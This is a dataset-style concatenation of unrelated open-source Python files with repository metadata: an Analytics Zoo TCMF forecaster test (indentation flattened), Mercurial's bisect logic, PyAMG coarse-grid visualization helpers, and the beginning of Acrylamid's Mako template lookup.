# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
import numpy as np
from zoo.chronos.forecaster.tcmf_forecaster import TCMFForecaster
from unittest import TestCase
import tempfile
import pandas as pd
class TestChronosModelTCMFForecaster(TestCase):
def setUp(self):
self.model = TCMFForecaster()
self.num_samples = 300
self.horizon = np.random.randint(1, 50)
self.seq_len = 480
self.data = np.random.rand(self.num_samples, self.seq_len)
self.id = np.arange(self.num_samples)
self.data_new = np.random.rand(self.num_samples, self.horizon)
self.fit_params = dict(val_len=12,
start_date="2020-1-1",
freq="5min",
y_iters=1,
init_FX_epoch=1,
max_FX_epoch=1,
max_TCN_epoch=1,
alt_iters=2)
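# Minimal usage sketch inferred from the tests below (all names come from this file):
#     model = TCMFForecaster()
#     model.fit({'id': self.id, 'y': self.data}, **self.fit_params)
#     yhat = model.predict(horizon=self.horizon)   # dict with 'id' and 'prediction'
# 'y' must be an ndarray of shape (num_samples, seq_len); the 'id' key is optional.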
def test_forecast_tcmf_ndarray(self):
ndarray_input = {'id': self.id, 'y': self.data}
self.model.fit(ndarray_input, **self.fit_params)
assert not self.model.is_xshards_distributed()
# test predict
yhat = self.model.predict(horizon=self.horizon)
# test save load
with tempfile.TemporaryDirectory() as tempdirname:
self.model.save(tempdirname)
loaded_model = TCMFForecaster.load(tempdirname, is_xshards_distributed=False)
yhat_loaded = loaded_model.predict(horizon=self.horizon)
yhat_id = yhat_loaded["id"]
np.testing.assert_equal(yhat_id, self.id)
yhat = yhat["prediction"]
yhat_loaded = yhat_loaded["prediction"]
assert yhat.shape == (self.num_samples, self.horizon)
np.testing.assert_array_almost_equal(yhat, yhat_loaded, decimal=4)
# test evaluate
target_value = dict({"y": self.data_new})
assert self.model.evaluate(target_value=target_value, metric=['mse'])
# test fit_incremental
self.model.fit_incremental({'y': self.data_new}) # 1st time
self.model.fit_incremental({'y': self.data_new}) # 2nd time
yhat_incr = self.model.predict(horizon=self.horizon)
yhat_incr = yhat_incr["prediction"]
assert yhat_incr.shape == (self.num_samples, self.horizon)
np.testing.assert_raises(AssertionError, np.testing.assert_array_equal, yhat, yhat_incr)
def test_tcmf_ndarray_covariates_dti(self):
ndarray_input = {'id': self.id, 'y': self.data}
self.model.fit(ndarray_input,
covariates=np.random.rand(3, self.seq_len),
dti=pd.date_range('20130101', periods=self.seq_len),
**self.fit_params)
future_covariates = np.random.randn(3, self.horizon)
future_dti = pd.date_range('20130101', periods=self.horizon)
# test predict
yhat = self.model.predict(horizon=self.horizon,
future_covariates=future_covariates,
future_dti=future_dti,
)
# test save load
with tempfile.TemporaryDirectory() as tempdirname:
self.model.save(tempdirname)
loaded_model = TCMFForecaster.load(tempdirname, is_xshards_distributed=False)
yhat_loaded = loaded_model.predict(horizon=self.horizon,
future_covariates=future_covariates,
future_dti=future_dti,
)
yhat_id = yhat_loaded["id"]
np.testing.assert_equal(yhat_id, self.id)
yhat = yhat["prediction"]
yhat_loaded = yhat_loaded["prediction"]
assert yhat.shape == (self.num_samples, self.horizon)
np.testing.assert_array_almost_equal(yhat, yhat_loaded, decimal=4)
# test evaluate
target_value = dict({"y": self.data_new})
assert self.model.evaluate(target_value=target_value,
target_covariates=future_covariates,
target_dti=future_dti,
metric=['mse'])
# test fit_incremental
self.model.fit_incremental({'y': self.data_new},
covariates_incr=future_covariates,
dti_incr=future_dti,)
yhat_incr = self.model.predict(horizon=self.horizon,
future_covariates=future_covariates,
future_dti=future_dti,
)
yhat_incr = yhat_incr["prediction"]
assert yhat_incr.shape == (self.num_samples, self.horizon)
np.testing.assert_raises(AssertionError, np.testing.assert_array_equal, yhat, yhat_incr)
def test_forecast_ndarray_error(self):
# is_xshards_distributed
with self.assertRaises(Exception) as context:
self.model.is_xshards_distributed()
self.assertTrue('You should run fit before calling is_xshards_distributed()'
in str(context.exception))
# fit
input = dict({'data': self.data})
with self.assertRaises(Exception) as context:
self.model.fit(input)
self.assertTrue("key `y` doesn't exist in x" in str(context.exception))
input = dict({'y': "abc"})
with self.assertRaises(Exception) as context:
self.model.fit(input)
self.assertTrue("the value of y should be an ndarray" in str(context.exception))
id_diff = np.arange(200)
input = dict({'id': id_diff, 'y': self.data})
with self.assertRaises(Exception) as context:
self.model.fit(input)
self.assertTrue("the length of the id array should be equal to the number of"
in str(context.exception))
input_right = dict({'id': self.id, 'y': self.data})
self.model.fit(input_right, **self.fit_params)
with self.assertRaises(Exception) as context:
self.model.fit(input_right)
self.assertTrue('This model has already been fully trained' in str(context.exception))
# fit_incremental
data_id_diff = {'id': self.id - 1, 'y': self.data_new}
with self.assertRaises(ValueError) as context:
self.model.fit_incremental(data_id_diff)
self.assertTrue('The input ids in fit_incremental differs from input ids in fit'
in str(context.exception))
# evaluate
target_value_fake = dict({"data": self.data_new})
with self.assertRaises(Exception) as context:
self.model.evaluate(target_value=target_value_fake, metric=['mse'])
self.assertTrue("key `y` doesn't exist in x" in str(context.exception))
def test_forecast_tcmf_without_id(self):
# construct data
input = dict({'y': self.data})
self.model.fit(input, **self.fit_params)
assert not self.model.is_xshards_distributed()
with tempfile.TemporaryDirectory() as tempdirname:
self.model.save(tempdirname)
loaded_model = TCMFForecaster.load(tempdirname, is_xshards_distributed=False)
yhat = self.model.predict(horizon=self.horizon)
yhat_loaded = loaded_model.predict(horizon=self.horizon)
assert "id" not in yhat_loaded
yhat = yhat["prediction"]
yhat_loaded = yhat_loaded["prediction"]
assert yhat.shape == (self.num_samples, self.horizon)
np.testing.assert_array_almost_equal(yhat, yhat_loaded, decimal=4)
target_value = dict({"y": self.data_new})
self.model.evaluate(target_value=target_value, metric=['mse'])
self.model.fit_incremental({'y': self.data_new}) # 1st time
yhat_incr = self.model.predict(horizon=self.horizon)
yhat_incr = yhat_incr["prediction"]
assert yhat_incr.shape == (self.num_samples, self.horizon)
np.testing.assert_raises(AssertionError, np.testing.assert_array_equal, yhat, yhat_incr)
data_new_id = {'id': self.id, 'y': self.data_new}
with self.assertRaises(ValueError) as context:
self.model.fit_incremental(data_new_id)
self.assertTrue('Got valid id in fit_incremental and invalid id in fit.'
in str(context.exception))
def test_forecast_tcmf_xshards(self):
from zoo.orca import OrcaContext
import zoo.orca.data.pandas
import pandas as pd
OrcaContext.pandas_read_backend = "pandas"
def preprocessing(df, id_name, y_name):
id = df.index
data = df.to_numpy()
result = dict({id_name: id, y_name: data})
return result
def postprocessing(pred_results, output_dt_col_name):
id_arr = pred_results["id"]
pred_results = pred_results["prediction"]
pred_results = np.concatenate((np.expand_dims(id_arr, axis=1), pred_results), axis=1)
final_df = pd.DataFrame(pred_results, columns=["id"] + output_dt_col_name)
final_df.id = final_df.id.astype("int")
final_df = final_df.set_index("id")
final_df.columns.name = "datetime"
final_df = final_df.unstack().reset_index().rename({0: "prediction"}, axis=1)
return final_df
def get_pred(d):
return d["prediction"]
with tempfile.NamedTemporaryFile() as temp:
data = np.random.rand(300, 480)
df = pd.DataFrame(data)
df.to_csv(temp.name)
shard = zoo.orca.data.pandas.read_csv(temp.name)
shard.cache()
shard_train = shard.transform_shard(preprocessing, 'id', 'data')
with self.assertRaises(Exception) as context:
self.model.fit(shard_train)
self.assertTrue("key `y` doesn't exist in x" in str(context.exception))
shard_train = shard.transform_shard(preprocessing, 'cid', 'y')
with self.assertRaises(Exception) as context:
self.model.fit(shard_train)
self.assertTrue("key `id` doesn't exist in x" in str(context.exception))
with self.assertRaises(Exception) as context:
self.model.is_xshards_distributed()
self.assertTrue('You should run fit before calling is_xshards_distributed()'
in str(context.exception))
shard_train = shard.transform_shard(preprocessing, 'id', 'y')
self.model.fit(shard_train, **self.fit_params)
assert self.model.is_xshards_distributed()
with self.assertRaises(Exception) as context:
self.model.fit(shard_train)
self.assertTrue('This model has already been fully trained' in str(context.exception))
with self.assertRaises(Exception) as context:
self.model.fit_incremental(shard_train)
self.assertTrue('NotImplementedError' in context.exception.__class__.__name__)
with tempfile.TemporaryDirectory() as tempdirname:
self.model.save(tempdirname + "/model")
loaded_model = TCMFForecaster.load(tempdirname + "/model", is_xshards_distributed=True)
horizon = np.random.randint(1, 50)
yhat_shard_origin = self.model.predict(horizon=horizon)
yhat_list_origin = yhat_shard_origin.collect()
yhat_list_origin = list(map(get_pred, yhat_list_origin))
yhat_shard = loaded_model.predict(horizon=horizon)
yhat_list = yhat_shard.collect()
yhat_list = list(map(get_pred, yhat_list))
yhat_origin = np.concatenate(yhat_list_origin)
yhat = np.concatenate(yhat_list)
assert yhat.shape == (300, horizon)
np.testing.assert_equal(yhat, yhat_origin)
output_dt_col_name = pd.date_range(start='2020-05-01', periods=horizon, freq='H').to_list()
yhat_df_shards = yhat_shard.transform_shard(postprocessing, output_dt_col_name)
final_df_list = yhat_df_shards.collect()
final_df = pd.concat(final_df_list)
final_df.sort_values("datetime", inplace=True)
assert final_df.shape == (300 * horizon, 3)
OrcaContext.pandas_read_backend = "spark"
def test_forecast_tcmf_distributed(self):
input = dict({'id': self.id, 'y': self.data})
from zoo.orca import init_orca_context, stop_orca_context
init_orca_context(cores=4, spark_log_level="INFO", init_ray_on_spark=True,
object_store_memory="1g")
self.model.fit(input, num_workers=4, **self.fit_params)
with tempfile.TemporaryDirectory() as tempdirname:
self.model.save(tempdirname)
loaded_model = TCMFForecaster.load(tempdirname, is_xshards_distributed=False)
yhat = self.model.predict(horizon=self.horizon, num_workers=4)
yhat_loaded = loaded_model.predict(horizon=self.horizon, num_workers=4)
yhat_id = yhat_loaded["id"]
np.testing.assert_equal(yhat_id, self.id)
yhat = yhat["prediction"]
yhat_loaded = yhat_loaded["prediction"]
assert yhat.shape == (self.num_samples, self.horizon)
np.testing.assert_equal(yhat, yhat_loaded)
self.model.fit_incremental({'y': self.data_new})
yhat_incr = self.model.predict(horizon=self.horizon)
yhat_incr = yhat_incr["prediction"]
assert yhat_incr.shape == (self.num_samples, self.horizon)
np.testing.assert_raises(AssertionError, np.testing.assert_array_equal, yhat, yhat_incr)
target_value = dict({"y": self.data_new})
assert self.model.evaluate(target_value=target_value, metric=['mse'])
stop_orca_context()
if __name__ == "__main__":
pytest.main([__file__])
|
intel-analytics/analytics-zoo
|
pyzoo/test/zoo/chronos/forecaster/test_tcmf_forecaster.py
|
Python
|
apache-2.0
| 14,337
|
[
"ORCA"
] |
05a9b94c77a2ca2dbe9d915bd14bd2b509bbd3c1c28edfab3d70fa6a54631b04
|
# Portions Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
# changelog bisection for mercurial
#
# Copyright 2007 Matt Mackall
# Copyright 2005, 2006 Benoit Boissinot <benoit.boissinot@ens-lyon.org>
#
# Inspired by git bisect.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
from __future__ import absolute_import
import collections
from . import error, pycompat, util
from .i18n import _
from .node import hex, short
def bisect(repo, state):
"""find the next node (if any) for testing during a bisect search.
returns a (nodes, number, good, badnode, goodnode) tuple, where badnode and
goodnode are the borders of the range.
'nodes' is the final result of the bisect if 'number' is 0.
Otherwise 'number' indicates the remaining possible candidates for
the search and 'nodes' contains the next bisect target.
'good' is True if bisect is searching for a first good changeset, False
if searching for a first bad one.
"""
changelog = repo.changelog
clparents = changelog.parentrevs
skip = set([changelog.rev(n) for n in state["skip"]])
def buildancestors(bad, good):
badrev = min([changelog.rev(n) for n in bad])
goodrev = max([changelog.rev(n) for n in good])
ancestors = collections.defaultdict(lambda: None)
for rev in repo.revs("descendants(%ln) - ancestors(%ln)", good, good):
ancestors[rev] = []
if ancestors[badrev] is None:
return badrev, goodrev, None
return badrev, goodrev, ancestors
good = False
badrev, goodrev, ancestors = buildancestors(state["bad"], state["good"])
if not ancestors: # looking for bad to good transition?
good = True
badrev, goodrev, ancestors = buildancestors(state["good"], state["bad"])
bad = changelog.node(badrev)
if not ancestors: # now we're confused
if (
len(state["bad"]) == 1
and len(state["good"]) == 1
and state["bad"] != state["good"]
):
raise error.Abort(_("starting revisions are not directly related"))
raise error.Abort(
_("inconsistent state, %s:%s is good and bad") % (badrev, short(bad))
)
badnode = changelog.node(badrev)
goodnode = changelog.node(goodrev)
# build children dict
children = {}
visit = collections.deque([badrev])
candidates = []
while visit:
rev = visit.popleft()
if ancestors[rev] == []:
candidates.append(rev)
for prev in clparents(rev):
if prev != -1:
if prev in children:
children[prev].append(rev)
else:
children[prev] = [rev]
visit.append(prev)
candidates.sort()
# have we narrowed it down to one entry?
# or have all other possible candidates besides 'bad' been skipped?
tot = len(candidates)
unskipped = [c for c in candidates if (c not in skip) and (c != badrev)]
if tot == 1 or not unskipped:
return ([changelog.node(c) for c in candidates], 0, good, badnode, goodnode)
perfect = tot // 2
# find the best node to test
best_rev = None
best_len = -1
poison = set()
for rev in candidates:
if rev in poison:
# poison children
poison.update(children.get(rev, []))
continue
a = ancestors[rev] or [rev]
ancestors[rev] = None
x = len(a) # number of ancestors
y = tot - x # number of non-ancestors
value = min(x, y) # how good is this test?
if value > best_len and rev not in skip:
best_len = value
best_rev = rev
if value == perfect: # found a perfect candidate? quit early
break
if y < perfect and rev not in skip: # all downhill from here?
# poison children
poison.update(children.get(rev, []))
continue
for c in children.get(rev, []):
if ancestors[c]:
ancestors[c] = list(set(ancestors[c] + a))
else:
ancestors[c] = a + [c]
assert best_rev is not None
best_node = changelog.node(best_rev)
return ([best_node], tot, good, badnode, goodnode)
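# Illustrative sketch (not part of mercurial): typical use of bisect() above:
#     nodes, remaining, good, badnode, goodnode = bisect(repo, load_state(repo))
#     if remaining == 0:
#         ...  # bisection finished; `nodes` holds the first good/bad candidate(s)
#     else:
#         ...  # test nodes[0] next; `remaining` candidates are still possible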
def checksparsebisectskip(repo, candidatenode, badnode, goodnode):
"""
Checks if the candidate node can be skipped as the contents haven't changed
within the sparse profile.
goodnode and badnode are the borders of the bisect range.
Returns "good" if the node can be skipped as it's the same as goodnode,
"bad" if the node can be skipped as it's the same as badnode, "check" otherwise.
"""
def diffsparsematch(node, diff):
if not util.safehasattr(repo, "sparsematch"):
return True
rev = repo.changelog.rev(node)
sparsematch = repo.sparsematch(rev)
return any(f for f in diff.keys() if sparsematch(f))
badmanifest = repo[badnode].manifest()
bestmanifest = repo[candidatenode].manifest()
goodmanifest = repo[goodnode].manifest()
baddiff = diffsparsematch(candidatenode, badmanifest.diff(bestmanifest))
gooddiff = diffsparsematch(candidatenode, bestmanifest.diff(goodmanifest))
if baddiff and not gooddiff:
return "good"
if not baddiff and gooddiff:
return "bad"
return "check"
def extendrange(repo, state, nodes, good):
# bisect is incomplete when it ends on a merge node and
# one of the parents was not checked.
parents = repo[nodes[0]].parents()
if len(parents) > 1:
if good:
side = state["bad"]
else:
side = state["good"]
num = len(set(i.node() for i in parents) & set(side))
if num == 1:
return parents[0].ancestor(parents[1])
return None
def load_state(repo):
state = {"current": [], "good": [], "bad": [], "skip": []}
for l in repo.localvfs.tryreadlines("bisect.state"):
l = pycompat.decodeutf8(l)
kind, node = l[:-1].split()
node = repo.lookup(node)
if kind not in state:
raise error.Abort(_("unknown bisect kind %s") % kind)
state[kind].append(node)
return state
def save_state(repo, state):
f = repo.localvfs("bisect.state", "wb", atomictemp=True)
with repo.wlock():
for kind in sorted(state):
for node in state[kind]:
f.writeutf8("%s %s\n" % (kind, hex(node)))
f.close()
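# Illustrative note (inferred from save_state above): the bisect.state file holds one
# "<kind> <hex node>" pair per line, for example
#     bad 4a3b...          (40-character hex node)
#     good 9f8e...
#     skip 1c2d...
# and load_state() reverses this, resolving each node through repo.lookup().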
def resetstate(repo):
"""remove any bisect state from the repository"""
if repo.localvfs.exists("bisect.state"):
repo.localvfs.unlink("bisect.state")
def checkstate(state):
"""check we have both 'good' and 'bad' to define a range
Raise Abort exception otherwise."""
if state["good"] and state["bad"]:
return True
if not state["good"]:
raise error.Abort(_("cannot bisect (no known good revisions)"))
else:
raise error.Abort(_("cannot bisect (no known bad revisions)"))
def get(repo, status):
"""
Return a list of revision(s) that match the given status:
- ``good``, ``bad``, ``skip``: csets explicitly marked as good/bad/skip
- ``goods``, ``bads`` : csets topologically good/bad
- ``range`` : csets taking part in the bisection
- ``pruned`` : csets that are goods, bads or skipped
- ``untested`` : csets whose fate is yet unknown
- ``ignored`` : csets ignored due to DAG topology
- ``current`` : the cset currently being bisected
"""
state = load_state(repo)
if status in ("good", "bad", "skip", "current"):
return list(map(repo.changelog.rev, state[status]))
else:
# In the following sets, we do *not* call 'bisect()' with more
# than one level of recursion, because that can be very, very
# time consuming. Instead, we always develop the expression as
# much as possible.
# 'range' is all csets that make the bisection:
# - have a good ancestor and a bad descendant, or conversely
# that's because the bisection can go either way
range = "( bisect(bad)::bisect(good) | bisect(good)::bisect(bad) )"
_t = repo.revs("bisect(good)::bisect(bad)")
# The sets of topologically good or bad csets
if len(_t) == 0:
# Goods are topologically after bads
goods = "bisect(good)::" # Pruned good csets
bads = "::bisect(bad)" # Pruned bad csets
else:
# Goods are topologically before bads
goods = "::bisect(good)" # Pruned good csets
bads = "bisect(bad)::" # Pruned bad csets
# 'pruned' is all csets whose fate is already known: good, bad, skip
skips = "bisect(skip)" # Pruned skipped csets
pruned = "( (%s) | (%s) | (%s) )" % (goods, bads, skips)
# 'untested' is all csets that are in 'range' but not in 'pruned'
untested = "( (%s) - (%s) )" % (range, pruned)
# 'ignored' is all csets that were not used during the bisection
# due to DAG topology, but may however have had an impact.
# E.g., a branch merged between bads and goods, but whose branch-
# point is outside of the range.
iba = "::bisect(bad) - ::bisect(good)" # Ignored bads' ancestors
iga = "::bisect(good) - ::bisect(bad)" # Ignored goods' ancestors
ignored = "( ( (%s) | (%s) ) - (%s) )" % (iba, iga, range)
if status == "range":
return repo.revs(range)
elif status == "pruned":
return repo.revs(pruned)
elif status == "untested":
return repo.revs(untested)
elif status == "ignored":
return repo.revs(ignored)
elif status == "goods":
return repo.revs(goods)
elif status == "bads":
return repo.revs(bads)
else:
raise error.ParseError(_("invalid bisect state"))
def label(repo, node):
rev = repo.changelog.rev(node)
# Try explicit sets
if rev in get(repo, "good"):
# i18n: bisect changeset status
return _("good")
if rev in get(repo, "bad"):
# i18n: bisect changeset status
return _("bad")
if rev in get(repo, "skip"):
# i18n: bisect changeset status
return _("skipped")
if rev in get(repo, "untested") or rev in get(repo, "current"):
# i18n: bisect changeset status
return _("untested")
if rev in get(repo, "ignored"):
# i18n: bisect changeset status
return _("ignored")
# Try implicit sets
if rev in get(repo, "goods"):
# i18n: bisect changeset status
return _("good (implicit)")
if rev in get(repo, "bads"):
# i18n: bisect changeset status
return _("bad (implicit)")
return None
def shortlabel(label):
if label:
return label[0].upper()
return None
def printresult(ui, repo, state, displayer, nodes, good):
if len(nodes) == 1:
# narrowed it down to a single revision
if good:
ui.write(_("The first good revision is:\n"))
else:
ui.write(_("The first bad revision is:\n"))
displayer.show(repo[nodes[0]])
extendnode = extendrange(repo, state, nodes, good)
if extendnode is not None:
ui.write(
_(
"Not all ancestors of this changeset have been"
" checked.\nUse bisect --extend to continue the "
"bisection from\nthe common ancestor, %s.\n"
)
% extendnode
)
else:
# multiple possible revisions
if good:
ui.write(
_(
"Due to skipped revisions, the first "
"good revision could be any of:\n"
)
)
else:
ui.write(
_(
"Due to skipped revisions, the first "
"bad revision could be any of:\n"
)
)
for n in nodes:
displayer.show(repo[n])
displayer.close()
|
facebookexperimental/eden
|
eden/scm/edenscm/mercurial/hbisect.py
|
Python
|
gpl-2.0
| 12,464
|
[
"VisIt"
] |
c09a3faaad317b617bf9a5dda0dab03138c90ae6ee7a72abbf3ee13743d7795b
|
"""
Visualization tools for coarse grids, both C/F splittings and aggregation.
Output is either to file (VTK) or to the screen (matplotlib).
vis_splitting: visualize C/F splittings through vertex elements
vis_aggregate_groups: visualize aggregation through groupings of edges, elements
"""
__docformat__ = "restructuredtext en"
import warnings
import numpy as np
from scipy.sparse import csr_matrix, coo_matrix, triu
from vtk_writer import write_basic_mesh, write_vtu
__all__ = ['vis_splitting', 'vis_aggregate_groups']
def vis_aggregate_groups(Verts, E2V, Agg, mesh_type, output='vtk',
fname='output.vtu'):
"""
Coarse grid visualization of aggregate groups. Create .vtu files for use
in Paraview or display with Matplotlib
Parameters
----------
Verts : {array}
coordinate array (N x D)
E2V : {array}
element index array (Nel x Nelnodes)
Agg : {csr_matrix}
sparse matrix for the aggregate-vertex relationship (N x Nagg)
mesh_type : {string}
type of elements: vertex, tri, quad, tet, hex (all 3d)
fname : {string, file object}
file to be written, e.g. 'output.vtu'
output : {string}
'vtk' or 'matplotlib'
Returns
-------
- Writes data to .vtu file for use in paraview (xml 0.1 format) or
displays to screen using matplotlib
Notes
-----
- Works for both 2d and 3d elements. Element groupings are colored
with data equal to 3.0, stringy edges in the aggregate with 2.0, and
singleton vertices with 1.0
Examples
--------
>>> from pyamg.aggregation import standard_aggregation
>>> from pyamg.vis.vis_coarse import vis_aggregate_groups
>>> from pyamg.gallery import load_example
>>> data = load_example('unit_square')
>>> A = data['A'].tocsr()
>>> V = data['vertices']
>>> E2V = data['elements']
>>> Agg = standard_aggregation(A)[0]
>>> vis_aggregate_groups(Verts=V, E2V=E2V, Agg=Agg, mesh_type='tri',
output='vtk', fname='output.vtu')
>>> from pyamg.aggregation import standard_aggregation
>>> from pyamg.vis.vis_coarse import vis_aggregate_groups
>>> from pyamg.gallery import load_example
>>> data = load_example('unit_cube')
>>> A = data['A'].tocsr()
>>> V = data['vertices']
>>> E2V = data['elements']
>>> Agg = standard_aggregation(A)[0]
>>> vis_aggregate_groups(Verts=V, E2V=E2V, Agg=Agg, mesh_type='tet',
output='vtk', fname='output.vtu')
"""
check_input(Verts=Verts, E2V=E2V, Agg=Agg, mesh_type=mesh_type)
map_type_to_key = {'tri': 5, 'quad': 9, 'tet': 10, 'hex': 12}
if mesh_type not in map_type_to_key:
raise ValueError('unknown mesh_type=%s' % mesh_type)
key = map_type_to_key[mesh_type]
Agg = csr_matrix(Agg)
# remove elements with dirichlet BCs
if E2V.max() >= Agg.shape[0]:
E2V = E2V[E2V.max(axis=1) < Agg.shape[0]]
# 1 #
# Find elements with all vertices in same aggregate
# account for 0 rows. Mark them as solitary aggregates
# TODO: (Luke) full_aggs is not defined, I think it's just a mask
# indicating which rows are not 0.
if len(Agg.indices) != Agg.shape[0]:
full_aggs = ((Agg.indptr[1:] - Agg.indptr[:-1]) == 0).nonzero()[0]
new_aggs = np.array(Agg.sum(axis=1), dtype=int).ravel()
new_aggs[full_aggs == 1] = Agg.indices # keep existing aggregate IDs
new_aggs[full_aggs == 0] = Agg.shape[1] # fill in singletons maxID+1
ElementAggs = new_aggs[E2V]
else:
ElementAggs = Agg.indices[E2V]
# 2 #
# find all aggregates encompassing full elements
# mask[i] == True if all vertices in element i belong to the same aggregate
mask = np.where(abs(np.diff(ElementAggs)).max(axis=1) == 0)[0]
# mask = (ElementAggs[:,:] == ElementAggs[:,0]).all(axis=1)
E2V_a = E2V[mask, :] # elements where element is full
Nel_a = E2V_a.shape[0]
# 3 #
# find edges of elements in the same aggregate (brute force)
# construct vertex to vertex graph
col = E2V.ravel()
row = np.kron(np.arange(0, E2V.shape[0]),
np.ones((E2V.shape[1],), dtype=int))
data = np.ones((len(col),))
if len(row) != len(col):
raise ValueError('Problem constructing vertex-to-vertex map')
V2V = coo_matrix((data, (row, col)), shape=(E2V.shape[0], E2V.max()+1))
V2V = V2V.T * V2V
V2V = triu(V2V, 1).tocoo()
# get all the edges
edges = np.vstack((V2V.row, V2V.col)).T
# all the edges in the same aggregate
E2V_b = edges[Agg.indices[V2V.row] == Agg.indices[V2V.col]]
Nel_b = E2V_b.shape[0]
# 3.5 #
# single node aggregates
sums = np.array(Agg.sum(axis=0)).ravel()
E2V_c = np.where(sums == 1)[0]
Nel_c = len(E2V_c)
# 4 #
# now write out the elements and edges
colors_a = 3*np.ones((Nel_a,)) # color triangles with threes
colors_b = 2*np.ones((Nel_b,)) # color edges with twos
colors_c = 1*np.ones((Nel_c,)) # color the vertices with ones
Cells = {1: E2V_c, 3: E2V_b, key: E2V_a}
cdata = {1: colors_c, 3: colors_b, key: colors_a} # cell data keyed by VTK cell type
write_vtu(Verts=Verts, Cells=Cells, fname=fname, cdata=cdata)
def vis_splitting(Verts, splitting, output='vtk', fname='output.vtu'):
"""
Coarse grid visualization for C/F splittings.
Parameters
----------
Verts : {array}
coordinate array (N x D)
splitting : {array}
coarse(1)/fine(0) flags
fname : {string, file object}
file to be written, e.g. 'output.vtu'
output : {string}
'vtk' or 'matplotlib'
Returns
-------
- Displays in screen or writes data to .vtu file for use in paraview
(xml 0.1 format)
Notes
-----
D :
dimension of coordinate space
N :
# of vertices in the mesh represented in Verts
Ndof :
# of dof (= ldof * N)
- simply color different points with different colors. This works
best with classical AMG.
- writes a file (or opens a window) for each dof
- for Ndof>1, they are assumed ordered [...dof1..., ...dof2..., etc]
Examples
--------
>>> import numpy as np
>>> from pyamg.vis.vis_coarse import vis_splitting
>>> Verts = np.array([[0.0,0.0],
... [1.0,0.0],
... [0.0,1.0],
... [1.0,1.0]])
>>> splitting = np.array([0,1,0,1,1,0,1,0]) # two variables
>>> vis_splitting(Verts,splitting,output='vtk',fname='output.vtu')
>>> from pyamg.classical import RS
>>> from pyamg.vis.vis_coarse import vis_splitting
>>> from pyamg.gallery import load_example
>>> data = load_example('unit_square')
>>> A = data['A'].tocsr()
>>> V = data['vertices']
>>> E2V = data['elements']
>>> splitting = RS(A)
>>> vis_splitting(Verts=V,splitting=splitting,output='vtk',
fname='output.vtu')
"""
check_input(Verts, splitting)
N = Verts.shape[0]
Ndof = len(splitting) // N  # integer number of dofs per vertex (used by range() below)
E2V = np.arange(0, N, dtype=int)
# adjust name in case of multiple variables
a = fname.split('.')
if len(a) < 2:
fname1 = a[0]
fname2 = '.vtu'
elif len(a) >= 2:
fname1 = "".join(a[:-1])
fname2 = a[-1]
else:
raise ValueError('problem with fname')
new_fname = fname
for d in range(0, Ndof):
# for each variables, write a file or open a figure
if Ndof > 1:
new_fname = fname1 + '_%d.' % (d+1) + fname2
cdata = splitting[(d*N):((d+1)*N)]
if output == 'vtk':
write_basic_mesh(Verts=Verts, E2V=E2V, mesh_type='vertex',
cdata=cdata, fname=new_fname)
elif output == 'matplotlib':
from pylab import figure, show, plot, xlabel, ylabel, title, axis
cdataF = np.where(cdata == 0)[0]
cdataC = np.where(cdata == 1)[0]
xC = Verts[cdataC, 0]
yC = Verts[cdataC, 1]
xF = Verts[cdataF, 0]
yF = Verts[cdataF, 1]
figure()
plot(xC, yC, 'r.', xF, yF, 'b.', clip_on=True)
title('C/F splitting (red=coarse, blue=fine)')
xlabel('x')
ylabel('y')
axis('off')
show()
else:
raise ValueError('problem with outputtype')
def check_input(Verts=None, E2V=None, Agg=None, A=None, splitting=None,
mesh_type=None):
"""Check input for local functions"""
if Verts is not None:
if not np.issubdtype(Verts.dtype, float):
raise ValueError('Verts should be of type float')
if E2V is not None:
if not np.issubdtype(E2V.dtype, np.integer):
raise ValueError('E2V should be of type integer')
if E2V.min() != 0:
warnings.warn('element indices begin at %d' % E2V.min())
if Agg is not None:
if Agg.shape[1] > Agg.shape[0]:
raise ValueError('Agg should be of size Npts x Nagg')
if A is not None:
if Agg is not None:
if (A.shape[0] != A.shape[1]) or (A.shape[0] != Agg.shape[0]):
raise ValueError('expected square matrix A\
and compatible with Agg')
else:
raise ValueError('problem with check_input')
if splitting is not None:
splitting = splitting.ravel()
if Verts is not None:
if (len(splitting) % Verts.shape[0]) != 0:
raise ValueError('splitting must be a multiple of N')
else:
raise ValueError('problem with check_input')
if mesh_type is not None:
valid_mesh_types = ('vertex', 'tri', 'quad', 'tet', 'hex')
if mesh_type not in valid_mesh_types:
raise ValueError('mesh_type should be %s' %
' or '.join(valid_mesh_types))
|
huahbo/pyamg
|
pyamg/vis/vis_coarse.py
|
Python
|
mit
| 10,031
|
[
"ParaView",
"VTK"
] |
17475e6c5b00bd6d0f67bc916dfa05e0ea98701d4be9c9593ba9932af6326ef3
|
# -*- encoding: utf-8 -*-
#
# Copyright 2012 Moritz Schlarb <mail@moritz-schlarb.de>. All rights reserved.
# Copyright 2013 Martin Zimmermann <info@posativ.org>. All rights reserved.
# License: BSD Style, 2 clauses -- see LICENSE.
from __future__ import absolute_import
import os
import io
import re
import ast
import posixpath
from os.path import getmtime, isfile
from itertools import chain
from collections import defaultdict
from acrylamid.templates import AbstractEnvironment, AbstractTemplate
from mako.lookup import TemplateLookup
from mako import exceptions, runtime
try:
from acrylamid.assets.web import Mixin
except ImportError:
from acrylamid.assets.fallback import Mixin
class CallVisitor(ast.NodeVisitor):
def __init__(self, callback):
self.callback = callback
super(CallVisitor, self).__init__()
def visit_Call(self, node):
if isinstance(node.func, ast.Name):
self.callback(node)
def unast(node):
if isinstance(node, ast.Str):
return node.s
elif isinstance(node, ast.List):
return [unast(item) for item in node.elts]
raise NotImplementedError(node)
def find_assets(tt):
"""
Parse AST from Mako template and yield *args, **kwargs from any
`compile` call.
"""
rv = []
def collect(node):
if node.func.id != "compile":
return
args = list(unast(x) for x in node.args)
kwargs = dict((x.arg, unast(x.value)) for x in node.keywords)
rv.append((args, kwargs))
CallVisitor(collect).visit(ast.parse(tt.code))
for args, kwargs in rv:
yield args, kwargs
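# Illustrative sketch (assumption, not part of acrylamid): for a template whose
# generated module code contains a call such as
#     compile("style.scss", output="style.css")
# iterating find_assets(tt) would yield (["style.scss"], {"output": "style.css"}),
# since unast() above only handles string and list literals.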
class ExtendedLookup(TemplateLookup):
"""
Custom Mako template lookup that records dependencies, mtime and referenced
web assets.
"""
inherits = re.compile(r'<%inherit file="([^"]+)" />')
